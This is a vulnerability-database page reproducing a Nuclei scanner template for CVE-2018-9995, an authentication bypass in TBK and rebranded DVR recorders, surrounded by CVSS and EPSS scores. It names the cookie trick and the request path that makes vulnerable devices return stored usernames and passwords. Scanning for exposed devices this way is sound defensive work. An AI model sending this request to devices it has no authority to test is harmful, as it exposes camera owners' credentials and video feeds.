Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-9995
HistoryApr 07, 2021 - 12:33 p.m.

TBK DVR4104/DVR4216 Devices - Authentication Bypass

2021-04-0712:33:31
ProjectDiscovery
github.com
12
tbk dvr4104
tbk4216
authentication bypass
remote attackers
cookie header

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.921

Percentile

99.0%

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
id: CVE-2018-9995

info:
  name: TBK DVR4104/DVR4216 Devices - Authentication Bypass
  author: princechaddha
  severity: critical
  description: |
    TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
    MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
    authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access.
  reference:
    - https://www.exploit-db.com/exploits/44577/
    - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html
    - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
    - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9995
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-9995
    epss-score: 0.90006
    epss-percentile: 0.98565
    cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tbkvision
    product: tbk-dvr4216_firmware
  tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision

http:
  - method: GET
    path:
      - "{{BaseURL}}/device.rsp?opt=user&cmd=list"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"uid\":"
          - "\"pwd\":"
          - "\"view\":"
          - "playback"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f8a7435cdb1586ce8cecf57ff66fabd247b725883530bd5b44819c6941c8c85d022008c3e2882a5bb6ff7b5a61697082e7f1360e3973d6bbc215c364ad54c2b0ed86:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.921

Percentile

99.0%